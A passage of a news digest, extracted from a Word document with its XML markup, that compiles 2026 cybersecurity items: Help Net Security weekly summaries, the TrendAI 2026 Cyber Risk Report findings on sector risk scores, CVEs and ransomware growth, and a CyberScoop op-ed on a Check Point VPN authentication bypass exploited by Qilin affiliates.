the software that carries most SSH traffic across the internet. The project released version 10.4 with eight security fixes, a set of bug corrections, and a couple of new features.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Power shortages could slow AI data center expansion AI adoption is increasing demand for data center capacity at the same time operators are running into limits around power, equipment, land, and permitting, according to NTT Data. Access to electricity is becoming a deciding factor in where new data centers are built, when new capacity comes online and how quickly AI projects can expand.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Microsoft wants to keep your AI agents from going rogue Microsoft has introduced Microsoft Execution Containers (MXC), a cross- platform, policy-driven execution layer for AI agents on Windows and Windows Subsystem for Linux (WSL), now available in early preview.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Developers can define constraints for their applications and agents, and Windows enforces them at runtime through MXC.</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Apple Container: Open-source tool for Linux containers on the Mac Developers on Apple silicon Macs have run Linux containers through software built around a single shared virtual machine for years. Apple's open-source Container project gives each Linux workload its own lightweight virtual machine.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Claude Cowork turns your phone into a remote control for AI work Anthropic started rolling out Claude Cowork, an AI agent that completes multi-step tasks, in beta for Max users on mobile and the web. They describe a goal, and Claude plans the work, uses the required tools, and produces outputs such as documents, spreadsheets, presentations, and reports.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 open-source cybersecurity tools to keep your team ready for anything AI is changing how security teams find vulnerabilities, analyze code, test applications, and protect infrastructure. Developers are building tools to secure AI systems themselves, from coding agents and memory protection to model exposure discovery. This roundup covers recent open-source releases for vulnerability research, application security testing, container security, endpoint protection, AI security, and penetration testing.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Thousands of malicious AI skills found capable of stealing data, running malware AI agents can browse the web, use external tools, execute commands, and perform tasks on behalf of users. Many rely on skills that define how they interact with services and data. Malicious skills can abuse those capabilities to steal data, execute malware, or manipulate an agent's behavior, according to the H1 2026 ESET Threat Report.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Wireshark 4.6.7 patches a dozen security flaws Network analysts who open packet captures in Wireshark push untrusted data through a large set of protocol dissectors, and each parser is a spot where a malformed frame can trip up the software. The 4.6.7 maintenance release closes twelve of those weak points. The fixes reach from cellular signaling parsers to the code that reads capture files off disk.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Product showcase: Protect your iPhone with McAfee Mobile Security McAfee Mobile Security for iOS combines scam protection, web protection, VPN, Wi-Fi security, and device security checks in a single app. It is also available for Android.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fake report message that ends with a stolen Reddit account A direct message arrives on Reddit from a stranger, and it invites a reply. That reply is the point. This scheme runs on social engineering, with no malware and no malicious links, and it has spread across Reddit, Discord, and similar platforms. The goal is a single piece of information: a login or verification code that hands your account to someone else.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AWS centralizes access, spending, and governance for Claude Claude apps gateway for AWS is a self-hosted control plane that gives organizations a single point of control over access, costs, and policies for Claude Code and Claude Desktop. It replaces per-developer cloud credentials, manual distribution of managed settings to developer laptops, and centralizes usage attribution and spending controls.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Only 28% of financial workforce MFA is phishing-resistant Passwords remain part of many workforce authentication flows in financial organizations, making phishing and credential theft major identity security risks, according to a new Secret Double Octopus report.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Microsoft is rewriting Windows patch guidance because of AI Microsoft is recommending that organizations shorten Windows update deployment timelines, warning that advances in AI are reducing the time attackers need to identify and exploit vulnerabilities after security updates are released.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Cybersecurity jobs available right now: July 7, 2026 We've scoured the market to bring you a selection of roles that span various skill levels within the cybersecurity field. Check out this weekly selection of cybersecurity jobs available right now.</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New infosec products of the week: July 10, 2026 Here's a look at the most interesting products from the past week, featuring releases from Attestiv, Automox, Codenotary, and First Recon AI.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EB1B73" w:rsidRDefault="00EB1B73" w:rsidP="00EB1B73">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Help Net Security 2026.07.12 11:37</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>https://www.helpnetsecurity.com/2026/07/12/week-in-review-accenture-data-breach-great-open-source-cybersecurity-tools/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>***</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EB1B73" w:rsidRDefault="00EB1B73" w:rsidP="00EB1B73">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>TrendAITM 2026 Cyber Risk Report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July 08, 2026</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TrendAITM 2026CYBER RISK REPORT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2026 Cyber Risk Report builds on last year's findings with expanded telemetry, providing organizations with the directional insights and data that can be used to help prioritize the exposures that matter most before attackers reach them.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TrendAITM Research tracks risk insights across enterprise environments globally to help organizations stay ahead of an evolving threat landscape. The 2026 Cyber Risk Report draws primarily on 2025 telemetry from the TrendAI Vision OneTM Cyber Risk Exposure Management (CREM) solution, XDR capabilities, and global threat intelligence infrastructure, supplemented by the latest available datasets where full-year coverage did not yet exist.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At the center of CREM is the Cyber Risk Index (CRI): a metric that quantifies an organization's overall security risk by consolidating individual asset and risk factor scores.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year's report introduces a new dataset drawn from telemetry from the TrendAI Vision OneTM Attack Path Prediction capability, providing a forward- looking complement to the Cyber Risk Index scores and event detections that anchor our annual analysis.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transitional report builds on the previous Cyber Risk Report. As 2026 telemetry matures, we expect the 2027 report to expand this view with more AI-related risk and threat datasets, building on the baseline risk, detection, vulnerability, and attack-path findings introduced here. Figures in this report reflect observations across our customer base rather than a statistically representative sample of any industry, region, or the threat landscape overall, and are presented as a directional signal. Explanations of why metrics move or differ reflect our analysts' informed judgment rather than statistically tested or causal findings.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Global Cyber Risk Index records second consecutive year of improvement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35.8</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Global average Cyber Risk Index, 2025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38.5 -&gt; 35.8</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Year-over-year CRI improvement 2024 to 2025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100%</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 of organizations in the telemetry still in the medium risk band (31 - 69)</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global average Cyber Risk Index fell from 38.5 in 2024 to 35.8 in 2025, continuing a positive trend. Monthly movement suggests the improvement was not linear: the CRI spiked to 37.4 in April, dropped to a low of 34.1 in July, and settled at 36.7 by year-end. The oscillating pattern contrasts with 2024's steady month-on-month decline and may indicate organizations are managing risk reactively rather than sustaining continuous improvement. Despite the year-over-year gain, every organization in the telemetry still falls within the medium risk band (31 - 69).</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Mining 42.5 CRI Mining enters the top of the rankings for the first time. Rapid OT digitization across geographically dispersed sites appears to be expanding the attack surface faster than security controls are being established. Unlike every other sector in the top five, email-borne threats lead its risk events-not cloud app access-pointing to targeted phishing as a likely primary initial access vector. Unoptimized Endpoint Sensor Settings suggest mining organizations may be operating with significant detection blind spots.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">Healthcare 40.3 CRI Healthcare remains in the top three for the second consecutive year. A large and diverse device estate-much of it running software that cannot be patched without regulatory approval or risk to patient care </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>continuity- keeps its CRI elevated. The 2024 mean time to patch data indicated healthcare was the slowest-patching industry at 41.5 days. Device Control Settings top its misconfiguration list, and Risky Cloud App Access leads its risk events, consistent with rapid adoption of cloud-based clinical tools without corresponding governance frameworks.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Agriculture 40.3 CRI Agriculture is the only sector in the top five whose risk events are dominated by Data Loss Prevention violations, suggesting that sensitive supply chain and operational data may be leaving the organization through insufficiently governed channels. Digital transformation driven by precision farming technologies and connected machinery appears to have expanded the attack surface faster than security maturity has developed. Device Control Settings top its misconfiguration list, consistent with its growing IoT and automated machinery footprint.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Telecommunications 39.9 CRI Telecommunications enters the top five for the first time, managing concurrent transitions across cloud-native architecture, 5G deployment, and software-defined infrastructure. It is the only sector in the top five with both inbound email policy violations and outbound data loss prevention failures simultaneously in its top risk events-a risk profile that extends beyond the organization to the customers and critical infrastructure that depend on it.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Education 39.8 CRI Education recorded the strongest CRI improvement of any sector, falling from a quarterly peak CRI of 45.1 in early 2024 to 39.8. Four of its five top risk events are identity-related: stale accounts, multi-factor authentication (MFA) disabled, password expiration disabled, and strong password disabled. The structural complexity of managing large, constantly rotating user populations continues to limit how quickly that risk can be resolved.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Government and public services 39.7 CRI Government and public services showed a marginal improvement from 40.3 in 2024. Long procurement cycles, legacy system dependencies, and large distributed workforces are consistent structural factors keeping this sector in the upper risk tier.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Communications 39.3 CRI One of the stronger year-over-year improvements in the top 10, down from 41.6 in 2024. Email-borne threats and data loss prevention violations continue to dominate its risk profile, and Possible Disabling of Antivirus Software topping its XDR detections suggests adversaries are actively working to neutralize defenses once inside.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Financial services 38.9 CRI MFA-disabled accounts persist as a top risk event despite financial services being among the most heavily regulated industries for cybersecurity, pointing to the gap between policy requirements and operational implementation across legacy systems and third-party integrations.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Utilities 38.9 CRI Utilities enters the top 10 for the first time. The convergence of OT and IT networks is expanding the attack surface, and many industrial control systems now being networked were designed for reliability rather than security, creating vulnerabilities that standard patching cycles are not equipped to address.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Insurance 38.8 CRI Insurance improved from 41.0 in 2024. A more diversified multi-cloud environment than most sectors, including Google Cloud Platform (GCP) alongside Amazon Web Services (AWS) and Microsoft Azure, is introducing governance complexity that may be slowing remediation.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Risk by company size: the mid-enterprise segment carries the highest CRI</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Organizations with 5,001 to 10,000 employees carry the highest CRI of any size segment at 41.5, exceeding even the largest enterprises. This segment operates with network complexity comparable to organizations above 10,000 employees but typically without the security operations maturity or staffing depth of that scale. The largest enterprises recorded the biggest absolute improvement, falling 3.8 points from 2024 to 40.4, likely reflecting the scale benefits of centralized risk management programs. Organizations with 100 or fewer employees are the only size band to record a CRI increase year-over-year, rising to 32.4, consistent with growing attacker interest in small businesses as entry points into larger supply chains.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Cloud access and identity dominate the risk event list for the second consecutive year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 of 10</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Top 10 risk events that are identity-related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 of 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Education's top 5 risk events that are directly identity-related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Risky Cloud App Access holds at number one and Stale Microsoft Entra ID Account at number two, both for the second year running. Seven of the top 10 risk events are identity-related, including MFA-disabled accounts at number four and password expiration disabled at numbers seven and nine. Their continued presence at the top of the list for two consecutive years suggests awareness of the problem has not translated into systematic remediation.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ZTSA (Zero Trust Secure Access) Rule Match - Private Access Control enters the top five for the first time, likely reflecting expanded zero trust adoption generating visibility into policy violations that previously went undetected. The concurrent presence of stale accounts and MFA failures in the same top 10 suggests zero trust frameworks are being deployed on top of identity foundations that have not yet been cleaned up.</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Security misconfigurations are co-occurring across the same environments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Web Reputation Settings tops the endpoint misconfiguration list for the second consecutive year. Anti-Malware Scanning, Predictive Machine Learning, Endpoint Sensors, Firewall, Application Control, and Behavior Monitoring settings are simultaneously unoptimized across thousands of environments. These are not independent gaps: each weakness compounds the others. In cloud environments, Application Control Settings, Firewall Settings, and Log </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Inspection Settings top the cloud misconfiguration list, pointing to a persistent gap between deployment and operationalization of cloud workload protection.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gap is not one of technology but of operationalization.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Misconfigurations persist in solutions capable of enforcing optimal settings. Identity risks accumulate in platforms capable of automating account lifecycle management. Vulnerabilities remain unpatched despite available fixes."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Attackers are prioritizing defense evasion as a first-stage objective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Possible Disabling of Antivirus Software tops the XDR model hits list in 2025, displacing Possible OS Credential Dumping from the position it held in 2024. The shift suggests adversaries have moved toward neutralizing endpoint defenses as a first-stage objective rather than attempting to evade them. Registry Run Key Creation in Temp Location, Backdoor File Detection, and Hacking Tool detections follow in the top 10, tracing a consistent attacker sequence: disable defenses, establish persistence, escalate privileges, move laterally.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 not assess vulnerability risk in isolation: lower severity CVEs can amplify higher severity ones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115 days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Average TrendAITM TippingPointTM virtual patch lead time, measured from vulnerability discovery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39 days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Average time for attackers to weaponize a vulnerability after public disclosure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All 10 of the most detected unpatched Common Vulnerabilities and Exposures (CVEs) are from 2025. Remote Code Execution (RCE) vulnerabilities-including CVE-2025-24035 (Windows Remote Desktop Services, 8.1 High) and CVE-2025- 21376 (Windows Lightweight Directory Access Protocol, or LDAP, 8.1 High)- enable attackers to execute arbitrary code remotely. Elevation of Privilege (EoP) vulnerabilities-including CVE-2025-24044 (Windows Kernel-Mode Driver, 7.8 High) and CVE-2025-21420 (Windows system utilities, 7.8 High)-provide the escalation pathway from initial foothold to full system control. Unpatched RCE and EoP vulnerabilities in the same environment provide attackers with a complete compromise pathway.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Three of the top 10 CVEs carry medium severity scores: CVE-2025-24992 (5.5), CVE-2025-21247 (4.3), and CVE-2025-21377 (6.5). None are independently critical, but each may directly enable the high-severity exploits on the same list-enabling local information disclosure, bypassing content security, or disclosing NTLM hashes for lateral movement.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Organizations that deprioritize these based on Common Vulnerability Scoring System (CVSS) score are leaving in place the conditions that make high- severity exploits more reliable.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TrendAITM TippingPointTM data suggests virtual patching can help bridge the gap: the average virtual patch lead time for 2025 vulnerabilities sits at 115 days from discovery, while attackers weaponize known vulnerabilities in an average of 39 days from public disclosure. Because discovery always precedes disclosure, virtual patching can provide a window of protection before a vulnerability becomes publicly known and actively targeted. The risk is treating virtual patching as a substitute for formal patching rather than a bridge to it.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Attack Path Prediction maps how adversaries move-not just where exposures exist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2,317,503</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Attack paths initiated by unpatched vulnerabilities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1,135,327</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Attack paths initiated by password spraying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880,527</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Attack paths initiated by password guessing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year's report introduces telemetry from the TrendAI Vision OneTM Attack Path Prediction capability, which models the chained sequences adversaries follow from an initial foothold through to a high-value target. Where the Cyber Risk Index measures current exposure, Attack Path Prediction simulates how that exposure may be exploited. Because full-year 2025 data was not yet available, this section should be read as a directional view of emerging patterns rather than a complete annual measurement.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Unpatched vulnerabilities are the single largest source of active attack paths, appearing at the head of 2,317,503 predicted paths, about 15% more than the combined total of the next two categories. Password spraying (1,135,327 paths) and password guessing (880,527 paths) rank second and third, feeding directly on the identity hygiene failures documented throughout this report.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Public IP addresses are the most common entry point asset type, averaging 4,979 assets per day. Domain assets-Domain Name System (DNS) hostnames attached to those IP addresses-average 2,781 per day, together defining the perimeter exposure dimension of attack path initiation. At the other end of the chain, user accounts are the most common terminal target, averaging 32,964 targeted assets per day, nearly double the second-ranked asset type (devices, at 18,445). The identity risks that elevate CRI scores appear to be the same conditions that make user accounts the preferred destination for adversary attack chains.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Ransomware ecosystem records 236% growth in confirmed breaches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236%</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Growth in confirmed ransomware breaches across the top 10 groups, 2024 to 2025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1,270%</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Year-over-year breach count increase by 2025's most prolific group, Qilin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Total confirmed ransomware breaches across the top 10 groups grew from 1,518 in 2024 to 5,096 in 2025. Five groups enter the top 10 for the first time: INC Ransom (558 breaches), SafePay (509), Lynx (279), DragonForce (264), and Sinobi (252). LockBit, ranked second in 2024, has dropped off the top 10 entirely following law enforcement disruption. RansomHub fell from first in 2024 to tenth in 2025 with 213 breaches.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Qilin (detected by TrendAITM as Agenda) climbed from last place in 2024 to first in 2025 with 1,262 confirmed breaches, a 1,270% increase. It operates as a ransomware-as-a-service platform, meaning its growth reflects an expanding affiliate network. Akira grew from 106 to 857 breaches, a 708% increase, making it the second most active group. The rapid entry of multiple new groups at scale suggests that disrupting established ransomware operations redistributes rather than reduces the overall threat.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capability to address identified risks already exists in deployed tools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consistent pattern across this report's findings is not a technology gap but an operationalization gap. Misconfigurations persist in solutions capable of enforcing optimal settings. Identity risks accumulate in platforms capable of automating account lifecycle management. Medium- severity CVEs are deprioritized despite their documented role in enabling high-severity exploits. The TrendAI Vision OneTM Cyber Risk Exposure Management (CREM) solution provides continuous attack surface visibility, unified risk scoring, XDR-powered detection and response, and automated remediation. Organizations that made the most measurable progress in 2025 are those that moved from periodic security reviews to continuous, intelligence-led risk management.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Posted in Roundup, Threat Reports, Attack surface, Cybersecurity, Patch management, Patching, Ransomware, Ransomware as a Service, Virtual Patching, Vulnerabilities</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EB1B73" w:rsidRDefault="00EB1B73" w:rsidP="00EB1B73">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Trend Micro 2026.07.08 17:50</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>https://www.trendmicro.com/vinfo/us/security/research-and-analysis/threat-reports/roundup/trendai-2026-cyber-risk-report</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>***</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EB1B73" w:rsidRDefault="00EB1B73" w:rsidP="00EB1B73">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Why patch directives only go so far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Six weeks of undetected access through a compromised VPN exposes why patching isn't a solution for the organizations already breached.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Brad LaPorte June 25, 2026</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(Getty Images)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When CISA issues an emergency directive, the message to every federal agency and every security team paying attention is to patch now. For CVE- 2026-50751, a CVSS 9.3 authentication bypass in Check Point Remote Access VPN, that directive landed on June 21. despite exploitation beginning in early May. That, six-week active intrusion gap is not a footnote. It is the entire story.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flaw itself is straightforward in the worst possible way. A logic error in the certificate-validation process, triggered when the deprecated IKEv1 key-exchange protocol is enabled, allows a remote attacker to establish a fully authenticated VPN session without a valid password. No phishing. No credential theft. No lateral movement required to reach the perimeter. The attacker walks through the front door, and the door logs it as a legitimate entry.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the time Check Point disclosed the vulnerability on June 8, a Qilin ransomware affiliate had already used it to compromise a few dozen organizations worldwide. The post-access playbook was efficient, including Rclone for data exfiltration, the Tox protocol for command-and-control communication routed through disposable VPS infrastructure. Quiet, fast, and designed to complete the job before detection had a chance to matter. The security product became the attack vector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is a particular irony to CVE-2026-50751 that the industry needs to sit with. The device that was breached is not an unpatched workstation or a misconfigured cloud bucket. It is the VPN gateway, the product sold specifically to keep attackers outside the perimeter. The control designed to prevent unauthorized access became the mechanism of it.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is not unique to Check Point, and it is not a criticism of any single vendor. It reflects a structural problem with perimeter-dependent security architecture. When the perimeter device is the trust anchor, compromising that device does not just breach the perimeter. It inherits the perimeter's authority. Every downstream control, every identity verification, every behavior-based detection tool is now reasoning about a session it believes is legitimate, because the VPN said so.</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is the condition Qilin exploited. And patching the vulnerability, while absolutely necessary, does nothing to change the position of organizations that were breached during the May-June window. For them, the attacker is already operating as a trusted user. The CISA directive is not a remedy for those organizations. It is a message to everyone else. Why the standard response falls short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standard sequence after a disclosure like this is one we've all heard before-patch the affected systems, update detection signatures, review logs for indicators of compromise. While each of these steps is good practice, none of them solves the underlying problem.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Patching closes the door for future attackers, but it does not evict the ones already inside. Detection signatures help identify known post- exploitation behavior, but ransomware affiliates have demonstrated consistent operational </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>discipline, using legitimate tools for exfiltration and standard protocols for command-and-control precisely because these approaches blend into normal traffic. Log review is valuable, but the attackers who exploited the vulnerability had weeks of access before anyone was looking.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detect-and-respond model assumes that detection arrives before the damage is complete. Against a weaponized zero-day with a six-week head start, that assumption does not hold. By the time an alert fires, the data has moved. The ransomware is staged. The ransom clock has started. Making the endpoint harder to exploit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Check Point vulnerability forces a critical question: how do you stop payload execution when an attacker has already succeeded at authentication and bypassed every other defense?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requires moving the defensive layer to the endpoint itself, at the point of execution, where the ransomware payload has to operate regardless of how access was obtained. Techniques that morph the runtime memory environment, transforming the structures that malware needs to find and use at execution time, stop the payload deterministically. The attacker can have authenticated credentials, a legitimate session, and weeks of undetected access. If the target environment does not look like what the payload expects, the payload fails.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is not a replacement for patching. Organizations should apply the Check Point fix immediately, and they should treat any system with IKEv1 enabled during the May-June window as potentially compromised. But patching is the beginning, as the organizations that were inside the six-week exploitation window need a control that works after the perimeter is gone. The lesson before the next directive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CISA will issue another emergency directive. There will be another authentication bypass, another perimeter device turned attack vector, another financially motivated threat actor with a head start measured in weeks. The patch-and-detect cycle will play out again, and organizations that had their exposure managed entirely at the perimeter will find themselves in the same position.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lesson here is not that Check Point failed or that VPNs are over. It is that any architecture where a single authentication bypass gives an attacker operating authority over the entire environment has a structural problem that no patch resolves. Closing the door is necessary. Making sure the ransomware cannot detonate even after the attacker is inside is the part the industry still has not solved at scale.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is the conversation the CISA directive should be starting, and mostly is not.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EB1B73" w:rsidRDefault="00EB1B73" w:rsidP="00EB1B73">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>CyberScoop 2026.06.25 14:33</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>https://cyberscoop.com/why-security-patching-is-not-enough-cve-2026-50751-op-ed/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>***</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EB1B73" w:rsidRDefault="00EB1B73" w:rsidP="00EB1B73">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Week in review: 74k Fortinet firewall credentials stolen, Splunk Enterprise RCE under active attack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Here's an overview of some of last week's most interesting news, articles, interviews and videos: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hardware neural network backdoor that hides in plain sight Deep learning systems on edge devices often rely on third-party-designed FPGAs and ASICs for performance and efficiency, creating supply chain risks. Researchers from the University of Tennessee and the University of Florida developed HAMLOCK, a backdoor attack that splits malicious functionality between hardware and software, making detection more difficult.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Onspring CISO on where automated GRC systems fall short In this interview with Help Net Security, Nichole Windholz, CISO at Onspring, talks about the limits of automated GRC systems and continuous control monitoring. She explains why color-coded dashboards can hide nuance, how teams can check the data feeding their tools, and which risks resist measurement, such as insider behavior and vendor concentration.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AI vulnerability discovery is pushing 2026 CVEs toward 66,000 Vulnerability disclosures are piling up faster in 2026 than anyone expected at the start of the year. The running count for the first few months sits well above the original projection, and the Forum of Incident Response and Security Teams (FIRST) now expects the year to land near 66,000 CVEs.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Reachability makes AI threat modeling worth the trust In this interview with Help Net Security, Oscar Andersson, CTO at Oplane, explains why most scanning tools fail. They cry wolf, flagging threats that cannot run in real code. The argument centers on reachability. A finding counts only when someone walks the path to impact on a working build.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SOC's visibility gap comes down to staffing AI has settled into security operations centers faster than any earlier wave of technology. Around four in five practitioners report reaching for AI or machine learning tools in their daily work. The catch shows up one layer down. Roughly a third of those same teams have built these tools into a defined workflow with structure, governance, and consistent validation. The rest pick up AI on their own, case by case, with no shared playbook for how it gets used or checked.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Chainguard Athena coalition already shipped 2,000 patches across 500 open source projects Chainguard launched Athena, an industry coalition that pools open source vulnerability findings and remediates them under embargo before public disclosure. The group went live with more than two dozen member organizations. Founding members include BNY, Chainguard, Cisco, Cloudflare, Corridor, DepthFirst, Docker, JPMorganChase, Kyndryl, LTIMindtree, and PwC.</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What happens to oversight when AI agents write a lab's own code Inside the labs building frontier AI, a growing share of the coding gets done by the AI itself. These agents write, edit, and run software with light human oversight between steps, and they reach into production infrastructure, research pipelines, and potentially the systems that train and evaluate future models.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Securing digital keys when your phone unlocks the car In this interview with Help Net Security, Alysia Johnson, President of the Car Connectivity Consortium (CCC), explains how the CCC Digital Key has grown from a single-brand feature into a standard meant to work across phones, automakers, and suppliers.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Your browser tab could become encrypted storage for someone else's files Decentralized storage networks already hand pieces of people's data to strangers' machines. The lasting question across these networks is whether the machine holding 